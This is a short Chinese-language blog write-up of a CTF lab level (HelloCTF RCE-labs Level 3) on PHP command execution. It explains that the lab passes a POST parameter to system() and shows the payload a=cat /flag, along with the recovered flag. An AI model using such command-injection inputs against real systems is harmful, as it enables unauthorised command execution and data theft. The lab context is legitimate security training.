技术栈

HelloCTF [RCE-labs] Level 3 - 命令执行

南暮思鸢2024-10-29 10:19

开启靶场,打开链接:

这关代码跟level 1的区别是eval(_POST\['a'\]);变成了system(_POST['a']);

system() 函数会通过软连接执行你输入的系统命令

POST传参:a=cat /flag

成功得到flag:

NSSCTF{b10b3661-b382-467e-86be-4c374fdd3e5f}

上一篇:再次被约谈了
下一篇:安卓早期apk兼容性适配之内存读写
相关推荐
LXMXHJ
1 小时前
php开发
开发语言·php
Bruce_Liuxiaowei
1 小时前
Windows系统错误6118全面解决方案:修复此工作组的服务器列表当前无法使用
运维·服务器·windows·网络安全
鹿鸣天涯
3 小时前
商用密码应用安全性评估
网络·安全·web安全
Jtti
5 小时前
SSH连接服务器超时?可能原因与解决方案
服务器·网络·php
jieyu1119
5 小时前
xxe靶场通关
安全·web安全
小糖学代码
7 小时前
网络:3.Socket编程TCP
网络·tcp/ip·php
雾岛听蓝
7 小时前
深入解析内存中的整数与浮点数存储
c语言·经验分享·笔记·visualstudio
聪明的笨猪猪
7 小时前
Java JVM “垃圾回收(GC)”面试清单(含超通俗生活案例与深度理解)
java·经验分享·笔记·面试
A Runner for leave
8 小时前
网络与通信安全课程复习汇总2——信息保密
web安全
BingoGo
10 小时前
PHP8.5 的新 URI 扩展
后端·php
热门推荐
01BongoCat - 跨平台键盘猫动画工具02GitHub 镜像站点03两千字总结:Codex 国内如何安装和使用的教程,以及如何设置中文回答04UV安装并设置国内源05Linux下V2Ray安装配置指南06GitLab 零基础入门指南:从安装到项目管理全流程07KGG转MP3工具|非KGM文件|解密音频08windows找不到gpedit.msc(本地组策略编辑器)0946个Nano-banana 精选提示词,持续更新中10在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)